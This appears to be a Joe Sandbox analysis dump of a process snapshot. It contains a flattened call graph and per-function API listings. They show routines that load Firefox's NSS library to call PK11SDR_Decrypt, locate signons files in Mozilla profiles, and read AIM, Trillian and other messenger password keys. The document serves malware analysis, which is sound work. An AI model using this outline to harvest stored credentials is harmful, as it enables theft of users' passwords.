6299->6298 6557 40ae7d 6299->6557 6301 40b39b 6300->6301 6302 40b3e5 SetCursor 6301->6302 6304 40b3dc qsort 6301->6304 6302->6177 6304->6302 6306 40a906 6305->6306 6307 40972b 3 API calls 6305->6307 6308 40a917 GetStdHandle 6306->6308 6309 40a90e 6306->6309 6307->6306 6310 40a914 6308->6310 6574 4067d3 CreateFileA 6309->6574 6312 40aa25 6310->6312 6313 40a92d 6310->6313 6315 406830 9 API calls 6312->6315 6575 40671b LoadCursorA SetCursor 6313->6575 6316 40aa2e 6315->6316 6339 40bdcf 6316->6339 6317 40a93a 6318 40a97f 6317->6318 6324 40a999 6317->6324 6576 409f97 6317->6576 6318->6324 6582 409e6e 6318->6582 6321 40a9ce 6322 40aa17 SetCursor 6321->6322 6323 40aa0e CloseHandle 6321->6323 6322->6316 6323->6322 6324->6321 6592 406830 6324->6592 6327 40c523 _strcmpi 6326->6327 6328 40c51f 6326->6328 6329 40c534 6327->6329 6330 40c538 _strcmpi 6327->6330 6328->6170 6329->6170 6331 40c549 6330->6331 6332 40c54d _strcmpi 6330->6332 6331->6170 6333 40c562 _strcmpi 6332->6333 6334 40c55e 6332->6334 6335 40c573 6333->6335 6336 40c577 _strcmpi 6333->6336 6334->6170 6335->6170 6337 40c588 6336->6337 6338 40c58c _mbsicmp 6336->6338 6337->6170 6338->6170 6340 40bdf6 6339->6340 6341 40bdda 6339->6341 6340->6174 6608 4093d6 6341->6608 6343 40bdef ??3@YAXPAX 6343->6340 6356 409370 6344->6356 6347 4095be memcpy memcpy 6348 409618 6347->6348 6348->6347 6349 409656 ??2@YAPAXI ??2@YAPAXI 6348->6349 6351 40876f 12 API calls 6348->6351 6350 409692 ??2@YAPAXI 6349->6350 6353 4096c9 6349->6353 6350->6353 6351->6348 6353->6353 6366 4094da 6353->6366 6355 403cc1 _strcmpi 6355->6170 6355->6171 6357 409382 6356->6357 6358 40937b ??3@YAXPAX 6356->6358 6359 409390 6357->6359 6360 409389 ??3@YAXPAX 6357->6360 6358->6357 6361 4093a1 6359->6361 6362 40939a ??3@YAXPAX 6359->6362 6360->6359 6363 4093c1 ??2@YAPAXI ??2@YAPAXI 6361->6363 6364 4093b1 ??3@YAXPAX 6361->6364 6365 4093ba ??3@YAXPAX 6361->6365 6362->6361 6363->6347 6364->6365 6365->6363 6367 407491 free 6366->6367 6368 4094e3 6367->6368 6369 407491 free 6368->6369 6370 4094eb 6369->6370 6371 407491 free 6370->6371 6372 4094f3 6371->6372 6373 407491 free 6372->6373 6374 4094fb 6373->6374 6375 40746b 4 API calls 6374->6375 6376 40950e 6375->6376 6377 40746b 4 API calls 6376->6377 6378 409518 6377->6378 6379 40746b 4 API calls 6378->6379 6380 409522 6379->6380 6381 40746b 4 API calls 6380->6381 6382 40952c 6381->6382 6382->6355 6384 4039c8 6383->6384 6405 40d725 6384->6405 6386 403a14 memset sprintf 6388 403a49 6386->6388 6387 403a60 _strcmpi 6387->6388 6388->6386 6388->6387 6389 403ab1 6388->6389 6420 411ec1 6388->6420 6389->6287 6389->6289 6392 40947e 6391->6392 6394 40948c 6391->6394 6547 40923a 6392->6547 6395 4094d7 6394->6395 6396 4094c9 6394->6396 6395->6294 6552 4091aa 6396->6552 6399 402d90 6398->6399 6400 402e0a 6398->6400 6399->6400 6401 402dc4 GetSystemMetrics 6399->6401 6400->6290 6401->6400 6402 402dd8 GetSystemMetrics 6401->6402 6402->6400 6403 402de6 6402->6403 6403->6400 6404 402def SetWindowPos 6403->6404 6404->6400 6424 40d3a0 memset 6405->6424 6419 40d772 6419->6386 6421 411ee3 GetPrivateProfileStringA 6420->6421 6422 411ed4 WritePrivateProfileStringA 6420->6422 6423 411ef6 6421->6423 6422->6423 6423->6388 6425 411dae 3 API calls 6424->6425 6426 40d3e8 6425->6426 6427 40d422 6426->6427 6515 407139 strlen strlen 6426->6515 6428 40d46b memset 6427->6428 6490 41212c 6427->6490 6498 41223f 6428->6498 6437 40d4ce 6514 4069d3 GetFileAttributesA 6437->6514 6438 40d4bb 6528 406b4b _mbscpy 6438->6528 6440 40d412 6440->6427 6444 40d417 _mbscpy 6440->6444 6444->6427 6445 40d4db 6450 40d4e9 memset 6445->6450 6446 40d450 6527 4069d3 GetFileAttributesA 6446->6527 6448 40d458 6448->6428 6449 40d45e _mbscpy 6448->6449 6449->6428 6451 41223f 10 API calls 6450->6451 6452 40d529 strlen strlen 6451->6452 6453 40d55f 6452->6453 6454 40d54c 6452->6454 6542 4069d3 GetFileAttributesA 6453->6542 6455 406b4b 4 API calls 6454->6455 6455->6453 6457 40d56c 6458 40d607 memset 6457->6458 6459 41223f 10 API calls 6458->6459 6460 40d647 strlen strlen 6459->6460 6461 40d67d 6460->6461 6462 40d66a 6460->6462 6543 4069d3 GetFileAttributesA 6461->6543 6463 406b4b 4 API calls 6462->6463 6463->6461 6465 40d68a 6466 40d578 memset 6465->6466 6467 41223f 10 API calls 6466->6467 6468 40d5b8 strlen strlen 6467->6468 6469 40d5ee 6468->6469 6470 40d5db 6468->6470 6544 4069d3 GetFileAttributesA 6469->6544 6471 406b4b 4 API calls 6470->6471 6471->6469 6473 40d5fb 6474 40d696 memset 6473->6474 6475 41223f 10 API calls 6474->6475 6476 40d6d6 strlen strlen 6475->6476 6477 40d70c 6476->6477 6478 40d6f9 6476->6478 6545 4069d3 GetFileAttributesA 6477->6545 6479 406b4b 4 API calls 6478->6479 6479->6477 6481 40d719 6482 411dae 6481->6482 6546 411d68 RegOpenKeyExA 6482->6546 6484 40d76c 6489 4069d3 GetFileAttributesA 6484->6489 6485 411dc4 6485->6484 6486 411d82 RegQueryValueExA 6485->6486 6487 411dd9 RegCloseKey 6486->6487 6487->6484 6489->6419 6531 411d68 RegOpenKeyExA 6490->6531 6492 412149 6493 41216d 6492->6493 6532 411d82 RegQueryValueExA 6492->6532 6495 412172 GetWindowsDirectoryA _mbscat 6493->6495 6496 40d439 6493->6496 6495->6496 6520 40680e strlen 6496->6520 6499 412192 2 API calls 6498->6499 6500 412251 6499->6500 6501 412284 memset 6500->6501 6534 406b06 6500->6534 6502 4122a4 6501->6502 6537 411d68 RegOpenKeyExA 6502->6537 6506 412275 SHGetSpecialFolderPathA 6507 40d48f strlen strlen 6506->6507 6507->6437 6507->6438 6508 4122d1 6509 412304 _mbscpy 6508->6509 6538 4121c1 6508->6538 6509->6507 6511 4122e2 6512 411d82 RegQueryValueExA 6511->6512 6513 4122f9 RegCloseKey 6512->6513 6513->6509 6514->6445 6517 407165 6515->6517 6518 407186 6515->6518 6516 407169 _memicmp 6516->6517 6516->6518 6517->6516 6517->6518 6518->6427 6519 4069d3 GetFileAttributesA 6518->6519 6519->6440 6521 406819 6520->6521 6522 40682d 6520->6522 6521->6522 6523 406820 _mbscat 6521->6523 6524 406958 strlen 6522->6524 6523->6522 6525 406969 6524->6525 6526 40696c memcpy 6524->6526 6525->6526 6526->6446 6527->6448 6529 40680e 2 API calls 6528->6529 6530 406b5d _mbscat 6529->6530 6530->6437 6531->6492 6533 411da5 RegCloseKey 6532->6533 6533->6493 6535 406b15 GetVersionExA 6534->6535 6536 406b26 6534->6536 6535->6536 6536->6501 6536->6506 6537->6508 6541 4121c6 6538->6541 6539 412233 _mbscpy 6539->6511 6540 412216 6540->6511 6541->6539 6541->6540 6542->6457 6543->6465 6544->6473 6545->6481 6546->6485 6548 409248 memset 6547->6548 6551 4092a0 6547->6551 6549 40925f 6548->6549 6548->6551 6550 409260 SendMessageA 6549->6550 6549->6551 6550->6549 6551->6394 6553 409234 6552->6553 6554 4091b8 6552->6554 6553->6395 6554->6553 6555 4091fd SendMessageA 6554->6555 6555->6554 6556->6297 6567 40972b ??2@YAPAXI 6557->6567 6559 40ae8b 6560 40aee2 6559->6560 6561 40aea2 strlen 6559->6561 6562 40aef6 _mbsicmp _mbsicmp 6560->6562 6566 40af50 6560->6566 6561->6560 6563 40aeae atoi 6561->6563 6562->6560 6565 40aebf 6563->6565 6564 407139 strlen strlen _memicmp 6564->6566 6565->6299 6566->6564 6566->6565 6568 4097d5 ??3@YAXPAX 6567->6568 6571 409762 6567->6571 6568->6559 6571->6568 6572 40501f SendMessageA 6571->6572 6573 40504d 6572->6573 6573->6571 6574->6310 6575->6317 6577 409fe3 6576->6577 6581 409f9f 6576->6581 6597 4067ec strlen WriteFile 6577->6597 6579 409ff1 6579->6318 6580 4067ec strlen WriteFile 6580->6581 6581->6577 6581->6580 6583 409f82 6582->6583 6590 409e83 6582->6590 6598 4067ec strlen WriteFile 6583->6598 6585 409f90 6585->6324 6586 409ead strchr 6587 409ebb strchr 6586->6587 6586->6590 6587->6590 6588 4074fa 7 API calls 6588->6590 6589 4067ec strlen WriteFile 6589->6590 6590->6583 6590->6586 6590->6588 6590->6589 6591 407491 free 6590->6591 6591->6590 6593 406840 GetLastError 6592->6593 6594 406848 6592->6594 6593->6594 6599 406735 6594->6599 6597->6579 6598->6585 6600 406752 LoadLibraryExA 6599->6600 6601 406769 FormatMessageA 6599->6601 6600->6601 6602 406764 6600->6602 6603 406782 strlen 6601->6603 6604 4067a7 _mbscpy 6601->6604 6602->6601 6606 40679c LocalFree 6603->6606 6607 40678f _mbscpy 6603->6607 6605 4067b6 sprintf MessageBoxA 6604->6605 6605->6321 6606->6605 6607->6606 6609 409370 5 API calls 6608->6609 6610 4093e4 6609->6610 6611 4093f7 6610->6611 6612 407491 free 6610->6612 6613 40940a 6611->6613 6615 407491 free 6611->6615 6614 4093f0 ??3@YAXPAX 6612->6614 6616 40941d 6613->6616 6618 407491 free 6613->6618 6614->6611 6617 409403 ??3@YAXPAX 6615->6617 6619 407491 free 6616->6619 6620 409430 free 6616->6620 6617->6613 6621 409416 ??3@YAXPAX 6618->6621 6622 409429 ??3@YAXPAX 6619->6622 6620->6343 6621->6616 6622->6620 8067 411e9a 8070 411c8f 8067->8070 8071 411c9c 8070->8071 8072 411ce6 memset GetPrivateProfileStringA 8071->8072 8073 411cab memset 8071->8073 8078 406fa6 strlen 8072->8078 8083 406f2d 8073->8083 8077 411d2f 8079 406fba 8078->8079 8081 406fbc 8078->8081 8079->8077 8080 407003 8080->8077 8081->8080 8087 406d5a strtoul 8081->8087 8084 406f96 WritePrivateProfileStringA 8083->8084 8085 406f3e 8083->8085 8084->8077 8085->8084 8086 406f45 sprintf memcpy 8085->8086 8086->8084 8086->8085 8087->8081 8301 41051f _wcsnicmp 8302 41059a 8301->8302 8303 41054a 8301->8303 8306 40fd01 memset memset 8303->8306 8305 410553 WideCharToMultiByte WideCharToMultiByte 8305->8302 8306->8305 5992 414db1 5993 414dc8 5992->5993 5996 414e36 5992->5996 5993->5996 5999 414df0 5993->5999 5995 414de7 5995->5996 5997 414e17 VirtualProtect 5995->5997 5997->5996 5998 414e26 VirtualProtect 5997->5998 5998->5996 6000 414df5 5999->6000 6005 414e36 6000->6005 6006 414e0d 6000->6006 6002 414dfe 6003 414e17 VirtualProtect 6002->6003 6002->6005 6004 414e26 VirtualProtect 6003->6004 6003->6005 6004->6005 6007 414e13 6006->6007 6008 414e17 VirtualProtect 6007->6008 6010 414e36 6007->6010 6009 414e26 VirtualProtect 6008->6009 6008->6010 6009->6010 8066 4067ba CreateFileA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004078FC
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407904
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 379999529-0
                                                                                                                                                                                                                    • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                                                    • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                                                                                                                                      • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                                                                                      • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                                                                                      • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                                                                                      • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                                                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                                                                    • API String ID: 2719586705-3659000792
                                                                                                                                                                                                                    • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                                                    • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 108 407c79-407dc2 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 109 407dc4 108->109 110 407df8-407dfb 108->110 111 407dca-407dd3 109->111 112 407e2c-407e30 110->112 113 407dfd-407e06 110->113 114 407dd5-407dd9 111->114 115 407dda-407df6 111->115 116 407e08-407e0c 113->116 117 407e0d-407e2a 113->117 114->115 115->110 115->111 116->117 117->112 117->113
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407CDB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407CEF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407D09
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407D1E
                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407D91
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407DA0
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                    • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                                                    • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 118 4064fb-40651b call 410c4c 121 406521-406555 memset call 406958 118->121 122 4066d9-4066e0 118->122 125 406563 121->125 126 406557-406561 121->126 127 406566-406568 125->127 126->127 128 4066d4 call 410d6f 127->128 129 40656e-4065d3 memset * 3 strlen * 2 127->129 128->122 131 4065d5-4065e6 call 406b4b 129->131 132 4065e8 129->132 135 4065ef-40660c strlen * 2 131->135 132->135 137 406621 135->137 138 40660e-40661f call 406b4b 135->138 140 406628-406645 strlen * 2 137->140 138->140 142 406647-406658 call 406b4b 140->142 143 40665a 140->143 144 406661-406670 call 4069d3 142->144 143->144 149 406681-406690 call 4069d3 144->149 150 406672-40667c call 4062db 144->150 154 4066a1-4066b0 call 4069d3 149->154 155 406692-40669c call 4062db 149->155 150->149 159 4066c1-4066d0 154->159 160 4066b2-4066bc call 4062db 154->160 155->154 159->128 161 4066d2 159->161 160->159 161->128
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406537
                                                                                                                                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040657E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406596
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004065AE
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004065B9
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004065C7
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004065F2
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406600
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040662B
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406639
                                                                                                                                                                                                                      • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                                                      • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                                                                                                                                      • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                                                                                                                                      • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                                                                                                                                      • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
                                                                                                                                                                                                                      • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                                                                                                                                    • String ID: signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                                                                    • API String ID: 4081699353-561706229
                                                                                                                                                                                                                    • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                                                    • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FC6B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FC82
                                                                                                                                                                                                                      • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                                                      • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                                                                                      • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040FCAD
                                                                                                                                                                                                                      • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                                                                                                                                                                                      • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                                                                                      • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040FCD5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                    • API String ID: 748118687-1174173950
                                                                                                                                                                                                                    • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                                                                                                    • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00412188
                                                                                                                                                                                                                      • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • :\Program Files, xrefs: 0041217E
                                                                                                                                                                                                                    • ProgramFilesDir, xrefs: 00412150
                                                                                                                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                                                                                                                                                                                                    • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                                    • API String ID: 3464146404-1099425022
                                                                                                                                                                                                                    • Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                                                                                                                                                                                                    • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
